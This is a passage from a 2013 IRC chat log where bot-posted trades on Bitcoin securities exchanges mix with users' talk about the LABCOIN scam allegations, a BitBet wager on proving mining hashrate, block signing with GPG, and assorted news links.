= 32.85 BTC [+] Sep 20 10:19:57 is that labcoin 3m owner shares being sold before the jig is up Sep 20 10:21:15 [BTCTC] [ASICMINER-PT] 1 @ 1.84 BTC [+] Sep 20 10:22:16 [BTCTC] [ASICMINER-PT] 2 @ 1.84 = 3.68 BTC [+] {2} Sep 20 10:24:18 [BTCTC] [ASICMINER-PT] 1 @ 1.84 BTC [+] Sep 20 10:25:19 [HAVELOCK] [HIM] 1 @ 0.19800001 BTC [+] Sep 20 10:27:21 [HAVELOCK] [AM100] 110 @ 0.01589999 = 1.749 BTC [-] {2} Sep 20 10:28:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.01727 = 0.1727 BTC [+] {2} Sep 20 10:29:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.0173 = 0.173 BTC [+] Sep 20 10:29:25 [BTCTC] [ASICMINER-PT] 2 @ 1.84 = 3.68 BTC [+] Sep 20 10:30:24 [BTCTC] [TAT.ASICMINER] 29 @ 0.0174 = 0.5046 BTC [+] **** BEGIN LOGGING AT Fri Sep 20 19:29:56 2013 Sep 20 19:33:18 [BTCTC] [LABCOIN] 191 @ 0.00121484 = 0.232 BTC [+] {4} Sep 20 19:36:21 [BTCTC] [ASICMINER-PT] 3 @ 1.70833333 = 5.125 BTC [+] {2} Sep 20 19:36:21 [BTCTC] [FN] [BTC-GROWTH] 37 @ 0.09621 = 3.5598 BTC [-] Sep 20 19:37:22 [BTCTC] [LABCOIN] 90 @ 0.001216 = 0.1094 BTC [+] Sep 20 19:38:23 [BTCTC] [LABCOIN] 10568 @ 0.00111812 = 11.8163 BTC [-] {4} Sep 20 19:38:23 [BTCTC] [ASICMINER-PT] 3 @ 1.73533333 = 5.206 BTC [+] {3} Sep 20 19:38:23 [BTCTC] [DMS.MINING] 60 @ 0.002 = 0.12 BTC [-] Sep 20 19:39:15 on the labcoin security page on BTCT it says "WARNING -- There is a lot of controversy over the reliability of the operator of this asset. Please place your orders accordingly." at the top Sep 20 19:39:18 https://btct.co/security/LABCOIN Sep 20 19:39:23 [BTCTC] [ASICMINER-PT] 1 @ 1.723 BTC [-] Sep 20 19:39:23 [BTCTC] [LABCOIN] 3392 @ 0.00119476 = 4.0526 BTC [+] {2} Sep 20 19:39:28 so funny Sep 20 19:39:31 in so many ways Sep 20 19:40:24 [BTCTC] [LABCOIN] 12208 @ 0.00109204 = 13.3316 BTC [-] {8} Sep 20 19:40:24 [HAVELOCK] [CBTC] 9989 @ 0.00032201 = 3.2166 BTC [-] {2} Sep 20 19:40:51 does Burnside WANT to go to jail? Sep 20 19:41:20 what do you think would be a better approach in his position? Sep 20 19:41:26 [BTCTC] [LABCOIN] 10000 @ 0.00106352 = 10.6352 BTC [-] {6} Sep 20 19:41:37 obviously he can't froze trading and they "sorry, lab was a scam. you lost everything" Sep 20 19:43:32 he cant be commenting like that Sep 20 19:43:34 as an exchange Sep 20 19:43:42 it influences the market Sep 20 19:43:49 if he thinks it's a scam Sep 20 19:43:55 he simply shuts it down Sep 20 19:44:09 that's pretty much "black and white" thinking Sep 20 19:44:14 but you have a point Sep 20 19:44:15 or announces a shut down Sep 20 19:44:18 whatever Sep 20 19:44:24 the point isnt the this or that Sep 20 19:44:27 the point is Sep 20 19:44:28 ThickAsThieves herp. Sep 20 19:44:28 [BTCTC] [ACTIVEMINING] 4131 @ 0.00167797 = 6.9317 BTC [-] {7} Sep 20 19:44:33 too late for that. it's on his head. Sep 20 19:44:50 it's not his role to be posting commentary on the asset page Sep 20 19:44:50 dexX7 there are no good approaches in his current position. Sep 20 19:45:07 his correct approach would have been back before i posted on trilema, doing the right thing. Sep 20 19:45:14 that's months ago. Sep 20 19:45:29 and further, this IS black and white thinking. Sep 20 19:45:30 [BTCTC] [LABCOIN] 18760 @ 0.00106393 = 19.9593 BTC [+] {6} Sep 20 19:46:30 [BTCTC] [ASICMINER-PT] 1 @ 1.681 BTC [-] Sep 20 19:46:39 in unrelated lol, Sep 20 19:46:40 "I got insider info. They will not deliver in September, guaranteed. Best case scenario, first week of October." Sep 20 19:46:54 knc? Sep 20 19:46:56 anonymous guarantees and people with insider info making public statements Sep 20 19:47:01 yeah some guy on bitbet. Sep 20 19:47:21 >bitcoin securities Sep 20 19:47:25 shiggy diggy Sep 20 19:47:59 doo Sep 20 19:48:32 [BTCTC] [DMS.MINING] 61 @ 0.001906 = 0.1163 BTC [-] {2} Sep 20 19:51:36 [BTCTC] [FN] [BTC-GROWTH] 19 @ 0.0962 = 1.8278 BTC [-] Sep 20 19:58:43 [BTCTC] [LABCOIN] 351 @ 0.00110553 = 0.388 BTC [-] {2} Sep 20 19:59:44 [BTCTC] [LABCOIN] 3499 @ 0.00110014 = 3.8494 BTC [-] {2} Sep 20 20:02:47 [BTCTC] [TAT.NEOBEE] 151007 @ 0.0030088 = 454.3499 BTC {106} Sep 20 20:02:47 [HAVELOCK] [NEOBEE] 43723 @ 0.00302679 = 132.3403 BTC {33} Sep 20 20:03:05 lol btct is offline Sep 20 20:03:16 fail! burnside Sep 20 20:03:48 [BTCTC] [TAT.NEOBEE] 184480 @ 0.003 = 553.44 BTC [-] {77} Sep 20 20:03:48 [HAVELOCK] [NEOBEE] 125474 @ 0.003 = 376.422 BTC [-] {46} Sep 20 20:03:49 [BTCTC] [LABCOIN] 3200 @ 0.00121546 = 3.8895 BTC [+] {9} Sep 20 20:04:03 adsad i heard buttfunder is the shit anyway Sep 20 20:04:17 aww but whay offline! Sep 20 20:04:45 wtf Sep 20 20:04:49 [HAVELOCK] [NEOBEE] 24546 @ 0.003 = 73.638 BTC [-] {8} Sep 20 20:04:50 [BTCTC] [TAT.NEOBEE] 16905 @ 0.003 = 50.715 BTC [-] {14} Sep 20 20:04:50 [BTCTC] [LABCOIN] 3000 @ 0.00130391 = 3.9117 BTC [+] {8} Sep 20 20:04:50 everyone is quitting on me Sep 20 20:05:50 [HAVELOCK] [NEOBEE] 619 @ 0.003 = 1.857 BTC [-] {5} Sep 20 20:05:52 [BTCTC] [LABCOIN] 250 @ 0.00125 = 0.3125 BTC [-] Sep 20 20:06:51 [BTCTC] [TAT.NEOBEE] 500 @ 0.003 = 1.5 BTC [-] Sep 20 20:07:53 [HAVELOCK] [NEOBEE] 60 @ 0.003 = 0.18 BTC [-] {2} Sep 20 20:07:54 [BTCTC] [TAT.NEOBEE] 665 @ 0.00299879 = 1.9942 BTC [-] {2} Sep 20 20:08:01 who quit ? Sep 20 20:08:53 [BTCTC] [TAT.NEOBEE] 1500 @ 0.003 = 4.5 BTC [+] Sep 20 20:09:54 [BTCTC] [LABCOIN] 4598 @ 0.00131254 = 6.0351 BTC [+] {4} Sep 20 20:10:55 [BTCTC] [LABCOIN] 790 @ 0.00130477 = 1.0308 BTC [-] {2} Sep 20 20:11:56 [BTCTC] [TAT.NEOBEE] 36 @ 0.003 = 0.108 BTC [+] Sep 20 20:12:57 [BTCTC] [LABCOIN] 25632 @ 0.001337 = 34.27 BTC [+] {14} Sep 20 20:13:58 [BTCTC] [CRYPTO-TRADE] 37 @ 0.1969 = 7.2853 BTC [-] Sep 20 20:13:58 [HAVELOCK] [NEOBEE] 45 @ 0.003 = 0.135 BTC [-] {2} Sep 20 20:14:59 [BTCTC] [TAT.NEOBEE] 180 @ 0.002999 = 0.5398 BTC [-] {2} Sep 20 20:15:51 kakobrekla: LOL Sep 20 20:16:00 [BTCTC] [TAT.NEOBEE] 249 @ 0.003 = 0.747 BTC [+] Sep 20 20:16:03 you leave buttfunder out of this :P Sep 20 20:16:51 WTF is that Solar wind shit mpoe-pr signed up to be a founding club member? Sep 20 20:17:01 [HAVELOCK] [NEOBEE] 1007 @ 0.003 = 3.021 BTC [-] {2} Sep 20 20:17:02 [HAVELOCK] [CFIG] 10 @ 0.1265 = 1.265 BTC [-] Sep 20 20:18:02 [HAVELOCK] [NEOBEE] 300 @ 0.003 = 0.9 BTC [-] Sep 20 20:19:03 [BTCTC] [TAT.ASICMINER] 169 @ 0.01667958 = 2.8188 BTC [+] {3} Sep 20 20:19:03 [BTCTC] [LABCOIN] 392 @ 0.001398 = 0.548 BTC [+] Sep 20 20:19:03 [HAVELOCK] [NEOBEE] 60 @ 0.003 = 0.18 BTC [-] Sep 20 20:21:04 [BTCTC] [TAT.NEOBEE] 163 @ 0.003 = 0.489 BTC [+] {2} Sep 20 20:21:44 reading a little more on that- LOL at PR for being a newbie Sep 20 20:22:05 [BTCTC] [BASIC-MINING] 2 @ 0.1102 = 0.2204 BTC [-] {2} Sep 20 20:23:06 [BTCTC] [TAT.NEOBEE] 1000 @ 0.003 = 3 BTC [+] Sep 20 20:24:07 [BTCTC] [LABCOIN] 700 @ 0.00139588 = 0.9771 BTC [-] {2} Sep 20 20:24:07 [BTCTC] [TAT.NEOBEE] 73 @ 0.003 = 0.219 BTC [+] Sep 20 20:24:07 [BTCTC] [ASICMINER-PT] 5 @ 1.726 = 8.63 BTC [+] Sep 20 20:24:31 jborkl what ?! Sep 20 20:25:08 [BTCTC] [LABCOIN] 392 @ 0.00135658 = 0.5318 BTC [-] {2} Sep 20 20:25:27 https://bitcointalk.org/index.php?topic=293098.0 Sep 20 20:25:37 ComingSoonShares for 100TH/s Mining Farm - [BitShare Giveaway CLOSED] Sep 20 20:25:47 MPOE-PR is a club member for noobs Sep 20 20:26:09 [BTCTC] [LABCOIN] 239 @ 0.001395 = 0.3334 BTC [+] Sep 20 20:26:26 I finally finished reading it and she was put on the list, not of her request Sep 20 20:26:34 i can state with authority that we have no fucking idea what that is. Sep 20 20:26:37 a a Sep 20 20:26:38 ok lol Sep 20 20:27:04 "lol. the idiot running the thread stuck my name in there in a retarded bid to make it sound like my criticism was actually interest. i addressed it, it's ongoing." Sep 20 20:27:10 [MPEX] [S.MPOE] 8650 @ 0.00092958 = 8.0409 BTC [+] Sep 20 20:27:10 [BTCTC] [FN] [DMS.PURCHASE] 20 @ 0.009251 = 0.185 BTC [-] Sep 20 20:28:01 it is funny to see her name on there, and then to read how it got on there is even better Sep 20 20:28:06 weirdly, i was just writing on the topic. published a minute ago : http://trilema.com/2013/were-you-misled-by-the-internet/ Sep 20 20:32:15 [BTCTC] [LABCOIN] 10098 @ 0.00139788 = 14.1158 BTC [+] {5} Sep 20 20:32:15 [BTCTC] [TAT.NEOBEE] 50 @ 0.002999 = 0.15 BTC [-] Sep 20 20:33:13 http://www.donttaxmycreditunion.org/big-banks-start-campaign-to-destroy-credit-unions/ Sep 20 20:33:16 [BTCTC] [LABCOIN] 1052 @ 0.00139954 = 1.4723 BTC [+] {3} Sep 20 20:33:35 sweet Sep 20 20:34:17 [BTCTC] [TAT.NEOBEE] 500 @ 0.00299 = 1.495 BTC [-] {4} Sep 20 20:34:18 [BTCTC] [LABCOIN] 3020 @ 0.00144966 = 4.378 BTC [+] {2} Sep 20 20:35:07 "In spite of controlling most of the financial assets and basically cornering the market on financial services, banks feel that the credit unions’ non-profit status does not allow banks to compete on a level playing field." Sep 20 20:35:19 [BTCTC] [LABCOIN] 1926 @ 0.00147521 = 2.8413 BTC [+] {3} Sep 20 20:35:26 well, it's not a matter that they feel. it's a matter of fact : if you pay more taxes than some other dude you're screwed Sep 20 20:35:29 It's laughable Sep 20 20:35:37 because that other dude can then murder you on rates and pretend like it's your fault. Sep 20 20:35:50 guess why credit unions can afford to not charge the 5 dollar per account thing boa wanted to put in. Sep 20 20:36:19 [BTCTC] [LABCOIN] 100 @ 0.001488 = 0.1488 BTC [+] Sep 20 20:36:43 I love my CU Sep 20 20:36:58 I used to bank with BoA, until they got super shady Sep 20 20:37:02 that's all fine and good, however, that doesn't make its argument any sounder. Sep 20 20:37:20 [BTCTC] [LABCOIN] 6356 @ 0.00145864 = 9.2711 BTC [-] {7} Sep 20 20:37:20 [BTCTC] [TAT.NEOBEE] 300 @ 0.00299999 = 0.9 BTC [+] {2} Sep 20 20:38:07 the solution is to get rid of aml, and general govt involvement. not to destroy banks by favouring credit unions. Sep 20 20:38:20 in ten years the cus will be just as corruipt as banks today. they are being corrupted by the government. Sep 20 20:38:22 [BTCTC] [LABCOIN] 150 @ 0.00132032 = 0.198 BTC [-] {2} Sep 20 20:39:23 [BTCTC] [TAT.NEOBEE] 1176 @ 0.003 = 3.528 BTC [+] Sep 20 20:40:23 [HAVELOCK] [SDSTM] 342 @ 0.00249983 = 0.8549 BTC [-] {5} Sep 20 20:40:25 [BTCTC] [LABCOIN] 5000 @ 0.00149785 = 7.4893 BTC [+] {3} Sep 20 20:41:24 [BTCTC] [ASICMINER-PT] 1 @ 1.718 BTC [-] Sep 20 20:42:22 Danny Brewster from Neo & Bee on Let's Talk Bitcoin with Adam Levine http://letstalkbitcoin.com/speculative/#.UjyI1cashLc Sep 20 20:42:25 [BTCTC] [LABCOIN] 10000 @ 0.00149962 = 14.9962 BTC [+] {5} Sep 20 20:43:26 [BTCTC] [TAT.ASICMINER] 28 @ 0.01723 = 0.4824 BTC [+] Sep 20 20:43:55 Ukyo? whats wrong Sep 20 20:49:33 [BTCTC] [ACTIVEMINING] 1450 @ 0.00189725 = 2.751 BTC [+] {8} Sep 20 20:49:33 [BTCTC] [LABCOIN] 1500 @ 0.0015 = 2.25 BTC [+] Sep 20 20:50:34 [BTCTC] [ASICMINER-PT] 1 @ 1.723 BTC [+] Sep 20 20:51:35 [BTCTC] [ASICMINER-PT] 1 @ 1.723 BTC [+] Sep 20 20:51:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.01723166 = 0.1034 BTC [+] {2} Sep 20 20:52:36 [BTCTC] [ASICMINER-PT] 2 @ 1.724 = 3.448 BTC [+] {2} Sep 20 20:53:37 [BTCTC] [ACTIVEMINING] 10000 @ 0.00170657 = 17.0657 BTC [-] {8} Sep 20 20:54:38 [BTCTC] [ACTIVEMINING] 457 @ 0.00172114 = 0.7866 BTC [+] {4} Sep 20 20:55:39 [BTCTC] [TAT.NEOBEE] 75 @ 0.003 = 0.225 BTC [+] Sep 20 20:56:40 [HAVELOCK] [CFIG] 12 @ 0.1262 = 1.5144 BTC [-] Sep 20 20:58:42 [HAVELOCK] [NEOBEE] 3650 @ 0.003 = 10.95 BTC [-] {2} Sep 20 21:02:46 [BTCTC] [LABCOIN] 776 @ 0.00150031 = 1.1642 BTC [+] {2} Sep 20 21:02:47 [BTCTC] [TAT.NEOBEE] 4350 @ 0.003 = 13.05 BTC [+] {2} Sep 20 21:07:51 [BTCTC] [LABCOIN] 5000 @ 0.001501 = 7.505 BTC [-] Sep 20 21:08:52 [HAVELOCK] [AM100] 20 @ 0.016755 = 0.3351 BTC [-] {2} Sep 20 21:08:53 [BTCTC] [LABCOIN] 767 @ 0.001502 = 1.152 BTC [+] Sep 20 21:09:53 [HAVELOCK] [NEOBEE] 103 @ 0.003 = 0.309 BTC [-] Sep 20 21:09:54 [BTCTC] [LABCOIN] 6601 @ 0.00159537 = 10.531 BTC [+] {5} Sep 20 21:10:54 [BTCTC] [LABCOIN] 5000 @ 0.001549 = 7.745 BTC [-] Sep 20 21:11:55 [HAVELOCK] [NEOBEE] 45 @ 0.003 = 0.135 BTC [-] Sep 20 21:13:57 [HAVELOCK] [NEOBEE] 500 @ 0.003 = 1.5 BTC [-] Sep 20 21:13:58 [BTCTC] [LABCOIN] 7000 @ 0.00166211 = 11.6348 BTC [+] {9} Sep 20 21:14:58 [BTCTC] [LABCOIN] 1000 @ 0.001675 = 1.675 BTC [+] Sep 20 21:15:39 labcoin getting little pumps Sep 20 21:15:40 lol Sep 20 21:17:01 [BTCTC] [TAT.NEOBEE] 100 @ 0.003 = 0.3 BTC [+] Sep 20 21:18:01 [BTCTC] [ASICMINER-PT] 4 @ 1.727 = 6.908 BTC [+] Sep 20 21:18:01 [BTCTC] [TAT.ASICMINER] 38 @ 0.01727973 = 0.6566 BTC [+] {2} Sep 20 21:20:02 [BTCTC] [ASICMINER-PT] 3 @ 1.71233333 = 5.137 BTC [-] {2} Sep 20 21:21:03 [BTCTC] [ASICMINER-PT] 10 @ 1.7 = 17 BTC [-] Sep 20 21:22:04 [BTCTC] [ASICMINER-PT] 10 @ 1.7 = 17 BTC [-] {2} Sep 20 21:22:04 [BTCTC] [TAT.NEOBEE] 200 @ 0.003 = 0.6 BTC [+] Sep 20 21:26:23 ;;bcstats Sep 20 21:26:25 Current Blocks: 259068 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 995 blocks | Next Difficulty In About: 5 days, 4 hours, 22 minutes, and 30 seconds | Next Difficulty Estimate: 138269647.385 | Estimated Percent Change: 22.76607 Sep 20 21:27:10 [BTCTC] [LABCOIN] 300 @ 0.001598 = 0.4794 BTC [-] Sep 20 21:27:11 [BTCTC] [DMS.MINING] 141 @ 0.001915 = 0.27 BTC [-] {2} Sep 20 21:27:17 Mmm b33r Sep 20 21:28:10 [HAVELOCK] [AM100] 10 @ 0.0165005 = 0.165 BTC [-] Sep 20 21:29:11 [BTCTC] [TAT.NEOBEE] 95 @ 0.003 = 0.285 BTC [+] Sep 20 21:29:12 [HAVELOCK] [AM100] 12 @ 0.0165 = 0.198 BTC [-] Sep 20 21:30:12 [HAVELOCK] [NEOBEE] 195 @ 0.003 = 0.585 BTC [-] Sep 20 21:33:15 [BTCTC] [TAT.NEOBEE] 792 @ 0.003 = 2.376 BTC [+] {2} Sep 20 21:35:19 [BTCTC] [TAT.NEOBEE] 3000 @ 0.003 = 9 BTC [+] Sep 20 21:35:19 [HAVELOCK] [SDSTM] 60 @ 0.0024405 = 0.1464 BTC [-] Sep 20 21:39:22 [HAVELOCK] [NEOBEE] 90 @ 0.003 = 0.27 BTC [-] Sep 20 21:39:57 hm Sep 20 21:40:43 your categories are gone Sep 20 21:41:24 [HAVELOCK] [AM100] 9 @ 0.01789999 = 0.1611 BTC [+] Sep 20 21:41:27 not really gone Sep 20 21:41:43 i just disabled [S] since its the most common by far Sep 20 21:41:52 and we can take it for granted :o Sep 20 21:42:01 my devs love it when you keep changing the format Sep 20 21:42:16 hehe Sep 20 21:42:21 get a socket Sep 20 21:42:25 [BTCTC] [LABCOIN] 111 @ 0.00149911 = 0.1664 BTC [+] {3} Sep 20 21:42:26 irc is for people Sep 20 21:42:41 workin on it i think Sep 20 21:43:08 lol Sep 20 21:43:15 ill add all exchanges/trades under one socket next week prolly Sep 20 21:43:26 [BTCTC] [TAT.NEOBEE] 164 @ 0.003 = 0.492 BTC [+] Sep 20 21:43:27 [BTCTC] [LABCOIN] 97 @ 0.00159 = 0.1542 BTC [+] Sep 20 21:43:41 at least you could have left two spaces between ] and [ in that spot as a typo Sep 20 21:43:44 cause currently is mpex only but since assbot aggregates now i guess it makes sense to offer raw via socket Sep 20 21:44:28 [BTCTC] [LABCOIN] 485 @ 0.001597 = 0.7745 BTC [+] Sep 20 21:46:06 http://www.theverge.com/2013/9/20/4752458/grand-theft-auto-v-earns-one-billion-in-three-days Sep 20 21:46:08 'Grand Theft Auto V' sets record by earning $1 billion in just three days | The Verge Sep 20 21:46:19 apparently there's money in videogames. Sep 20 21:46:21 who knew. Sep 20 21:46:28 no pc edition Sep 20 21:46:29 [BTCTC] [TAT.NEOBEE] 650 @ 0.003 = 1.95 BTC [+] Sep 20 21:47:02 fuckers Sep 20 21:47:12 rockstar-ipo Sep 20 21:47:14 go go Sep 20 21:47:56 20:46.33 ( @assbot ) [BTCTC] [TAT.NEOBEE] 650 @ 0.003 = 1.95 BTC [+] Sep 20 21:48:01 did it dip below 003? Sep 20 21:48:18 people just selling, thinking it would sell out faster Sep 20 21:49:12 hm? Sep 20 21:49:39 i mean if theres a [+] means previous not 0.003 was lower than that Sep 20 21:49:59 and Sep 20 21:49:59 20:39.26 ( @assbot ) [HAVELOCK] [NEOBEE] 90 @ 0.003 = 0.27 BTC [-] Sep 20 21:50:04 means it was higher than 003 Sep 20 21:50:07 one sold at 299 Sep 20 21:50:29 I'm sad that my labcoin bet was rejected. it would have been so good Sep 20 21:50:33 [HAVELOCK] [NEOBEE] 1666 @ 0.003 = 4.998 BTC [-] Sep 20 21:51:05 which Sep 20 21:51:37 labcoin providing a proof of at least 1TH/s of mining with either signed blocks or public pool username Sep 20 21:51:39 what was the reason? Sep 20 21:52:05 " Easy to falsify with help from friendly miner." Sep 20 21:52:20 and I disagree - very few people have access to 1TH Sep 20 21:53:03 maybe if you reword the bet? Sep 20 21:53:05 They couldn't even do it lol Sep 20 21:53:31 well right now their proof does not even satisfy the bet (and they have less than 1TH) Sep 20 21:53:42 theres a difference between they will show the hashing or really be hashing Sep 20 21:53:58 oh Sep 20 21:54:04 maybe Sep 20 21:54:18 but absolutely no one is going to vote Yes now, it's too late Sep 20 21:54:36 ah well Sep 20 21:54:36 next time then Sep 20 21:54:50 http://home.woot.com/ Sep 20 21:54:54 ^ I want Sep 20 21:54:56 Home.Woot Sep 20 22:05:47 [MPEX] [S.MPOE] 6500 @ 0.00093251 = 6.0613 BTC [+] {2} Sep 20 22:05:47 [HAVELOCK] [NEOBEE] 52 @ 0.003 = 0.156 BTC [-] Sep 20 22:09:51 [HAVELOCK] [HIM] 20 @ 0.18999 = 3.7998 BTC [-] Sep 20 22:10:52 [BTCTC] [LABCOIN] 634 @ 0.0015 = 0.951 BTC [-] Sep 20 22:12:54 [HAVELOCK] [NEOBEE] 2250 @ 0.003 = 6.75 BTC [-] Sep 20 22:13:55 [HAVELOCK] [CFIG] 2 @ 0.1256 = 0.2512 BTC [-] {2} Sep 20 22:14:56 [HAVELOCK] [NEOBEE] 80 @ 0.003 = 0.24 BTC [-] Sep 20 22:18:15 pankkake i think you misunderstand how hashing works. Sep 20 22:18:34 hashing is not measurable directly. it is inferred. having a few blocks signed does not prove any particular hashing. Sep 20 22:18:52 make your block read "no less than X signed blocks in between Y and Z dates", that is proof of hashing Sep 20 22:19:08 but because of the way hashing works someone with 10 th could still fail the bet. Sep 20 22:19:16 statistically it's about a 1 in 100 shot. Sep 20 22:20:01 [BTCTC] [LABCOIN] 200 @ 0.00145 = 0.29 BTC [-] Sep 20 22:20:21 yeah but you can still bet on "labcoin is capable of signing blocks" Sep 20 22:20:21 or for that matter, someone doing 1 gh/s could solve each block from now on until the next olympic games. Sep 20 22:20:23 or whatever Sep 20 22:20:25 not too likely, but possible. Sep 20 22:20:55 a bet of the sort "labcoin will sign at least X blocks in octomber" is weak however, because most miners don't sign their blocks. Sep 20 22:21:08 if i offer a miner 1 btc per block to sign it for me, that's just 1 extra btc he makes, like the fees. Sep 20 22:21:13 so he signs it. what does he care. Sep 20 22:23:15 21:21.55 ( kakobrekla ) ok so "some X blocks will be signed with as labcoin is mining them" Sep 20 22:23:16 21:21.56 ( kakobrekla ) is valid Sep 20 22:23:16 21:21.58 ( kakobrekla ) :) Sep 20 22:23:16 21:22.17 ( kakobrekla ) not valid english, but valid bet Sep 20 22:24:12 i guess it is marginally valid, just as long as bettors understand the weakness. Sep 20 22:24:30 which i guess is satisfied as it's been plainly stated here. Sep 20 22:25:57 :) Sep 20 22:27:08 [HAVELOCK] [AM100] 10 @ 0.0169 = 0.169 BTC [-] Sep 20 22:27:10 [HAVELOCK] [NEOBEE] 46 @ 0.003 = 0.138 BTC [-] Sep 20 22:27:11 [BTCTC] [LABCOIN] 120 @ 0.00145 = 0.174 BTC [-] Sep 20 22:28:06 of course this problem wouldn't exist in the first place if people actually used gpg properly. Sep 20 22:28:10 [BTCTC] [LABCOIN] 808 @ 0.00136541 = 1.1033 BTC [-] {5} Sep 20 22:28:10 [BTCTC] [FN] [COG.F] 1 @ 2.7 BTC [-] Sep 20 22:28:10 [HAVELOCK] [CFIG] 5 @ 0.1201 = 0.6005 BTC [-] {2} Sep 20 22:28:32 for instance, if i were to sign blocks with my gpg signature the suspicioun would be misplaced, as it's not bloody likely i've shared my private key with some random miner to win a bet. Sep 20 22:28:55 sadly, people want to participate in bitcoin without a clue of what's what, how it works and why it works that way. Sep 20 22:29:03 and then they pretend like they're actually involved. Sep 20 22:29:11 [BTCTC] [LABCOIN] 320 @ 0.001355 = 0.4336 BTC [-] Sep 20 22:29:11 [BTCTC] [BASIC-MINING] 7 @ 0.11424285 = 0.7997 BTC [+] {2} Sep 20 22:29:11 [HAVELOCK] [NEOBEE] 190 @ 0.003 = 0.57 BTC [-] Sep 20 22:30:12 [BTCTC] [BASIC-MINING] 10 @ 0.10751999 = 1.0752 BTC [-] {3} Sep 20 22:31:13 [BTCTC] [BASIC-MINING] 1 @ 0.1199 BTC [+] Sep 20 22:32:14 [BTCTC] [BASIC-MINING] 17 @ 0.10937646 = 1.8594 BTC [-] {4} Sep 20 22:33:15 [BTCTC] [BASIC-MINING] 8 @ 0.1087 = 0.8696 BTC [-] {3} Sep 20 22:34:16 [BTCTC] [BASIC-MINING] 11 @ 0.11541818 = 1.2696 BTC [+] {3} Sep 20 22:35:17 [BTCTC] [BASIC-MINING] 6 @ 0.106 = 0.636 BTC [-] Sep 20 22:35:48 mircea_popescu dunno if 'likley' cuts it in this case Sep 20 22:35:52 likely Sep 20 22:36:14 i mean its subjective Sep 20 22:36:18 [BTCTC] [BASIC-MINING] 3 @ 0.10593333 = 0.3178 BTC [-] {2} Sep 20 22:36:21 not bloody likely. it's not likely. Sep 20 22:36:32 still subjective Sep 20 22:36:33 it's that the miner getting it can then sign themselves all sorts of goodies Sep 20 22:36:38 maybe not to bbet but to outsider Sep 20 22:36:41 how is it subjective ? Sep 20 22:37:07 i still dont see how is it not Sep 20 22:37:49 reality does not imply sanity and sanity does not imply reality Sep 20 22:37:52 because signatures with a history have a value. my signature is oposable to me, i'm not likely to share it for that reason. (miner than can go, hey, here's a contract you signedm, you owe me 10000 btc) Sep 20 22:38:27 yes Sep 20 22:38:30 again 'likely' Sep 20 22:38:39 assumption. Sep 20 22:38:45 the mother of all fuckups. Sep 20 22:39:06 purely stylistic point. Sep 20 22:39:11 lol Sep 20 22:39:17 because signatures with a history have a value. my signature is oposable to me, i'm never going to share it for that reason. (miner than can go, hey, here's a contract you signedm, you owe me 10000 btc) Sep 20 22:39:18 better ? Sep 20 22:39:21 [BTCTC] [ACTIVEMINING] 184 @ 0.00170305 = 0.3134 BTC [-] {2} Sep 20 22:40:09 im not sure i can unsee the likeliness Sep 20 22:40:22 [BTCTC] [ACTIVEMINING] 136 @ 0.001703 = 0.2316 BTC [-] Sep 20 22:40:25 but whatever, this is going nowhere fast and i have food on the table to eat so bbl Sep 20 22:40:54 enjoy. Sep 20 22:42:01 hmm, yeah the GPG signing of blocks would be perfect. well if they ever used the key for something else… Sep 20 22:42:24 [BTCTC] [ACTIVEMINING] 62 @ 0.001703 = 0.1056 BTC [-] Sep 20 22:42:25 and I do understand how hashing works, I would have prefered the pool only method but wanted to allow their bullshit about solo mining Sep 20 22:42:42 you would have to take the risk of a statistical variation Sep 20 22:43:26 I was missing a minimum days of obversation, maybe Sep 20 22:43:46 yeah. Sep 20 22:44:01 it's a nitnoy thing, but you know how it is, bets get contentious after they resolve. Sep 20 22:44:10 then random bystander is, "why didn't you make them clearer!!!" Sep 20 22:44:27 and i say "because it's not possible to do" and their eyes glaze over cause i'm insane. Sep 20 22:45:27 [BTCTC] [S.MPOE-PT] 196 @ 0.0008011 = 0.157 BTC [+] Sep 20 22:45:58 so fractal/whatever is already hurting bitbet by making you paranoid! Sep 20 22:46:29 [BTCTC] [LABCOIN] 100 @ 0.00154998 = 0.155 BTC [+] {2} Sep 20 22:46:55 nah, i was paranoid before. Sep 20 22:47:06 it's just that i have limits to my paranoia. it's all very healthy overal. Sep 20 22:47:45 I agree Sep 20 22:50:31 [HAVELOCK] [AM100] 95 @ 0.01688789 = 1.6043 BTC [-] {3} Sep 20 22:51:33 [BTCTC] [LABCOIN] 100 @ 0.00136005 = 0.136 BTC [-] {2} Sep 20 22:52:33 [BTCTC] [TAT.ASICMINER] 165 @ 0.01670636 = 2.7565 BTC [-] {3} Sep 20 22:52:33 [HAVELOCK] [AM1] 2 @ 1.662 = 3.324 BTC [-] {2} Sep 20 22:54:35 [BTCTC] [TAT.NEOBEE] 500 @ 0.002999 = 1.4995 BTC [-] Sep 20 22:55:24 kakobrekla : "or for that matter, someone doing 1 gh/s could solve each block from now on until the next olympic games. not too likely, but possible.". also subjective ? :D Sep 20 22:59:40 [BTCTC] [CB.IDIFF-E] 7 @ 0.02399 = 0.1679 BTC [-] Sep 20 23:00:41 [HAVELOCK] [AM1] 2 @ 1.82499999 = 3.65 BTC [+] {2} Sep 20 23:01:42 [HAVELOCK] [AM1] 1 @ 1.82499999 BTC [+] Sep 20 23:04:45 [BTCTC] [LABCOIN] 2500 @ 0.00158241 = 3.956 BTC [+] {7} Sep 20 23:06:09 I feel like the times when blocks aren't solved for 1 hour is a problem Sep 20 23:06:13 not that I have a solution Sep 20 23:06:30 go for a walk, problem solved! Sep 20 23:09:39 is theswede75 on wot? Sep 20 23:09:50 [BTCTC] [LABCOIN] 1264 @ 0.00159399 = 2.0148 BTC [+] {2} Sep 20 23:10:22 nvm Sep 20 23:10:51 [BTCTC] [LABCOIN] 3905 @ 0.00162728 = 6.3545 BTC [+] {3} Sep 20 23:11:52 [BTCTC] [LABCOIN] 63238 @ 0.00173097 = 109.4631 BTC [+] {19} Sep 20 23:14:55 [HAVELOCK] [AM100] 8 @ 0.01651 = 0.1321 BTC [+] Sep 20 23:14:56 [BTCTC] [LABCOIN] 6762 @ 0.00176 = 11.9011 BTC [+] Sep 20 23:14:56 [BTCTC] [ACTIVEMINING] 2713 @ 0.00169544 = 4.5997 BTC [-] {6} Sep 20 23:18:59 [BTCTC] [BASIC-MINING] 100 @ 0.12256799 = 12.2568 BTC [+] {4} Sep 20 23:21:01 [BTCTC] [LABCOIN] 7490 @ 0.00169337 = 12.6833 BTC [+] {2} Sep 20 23:22:02 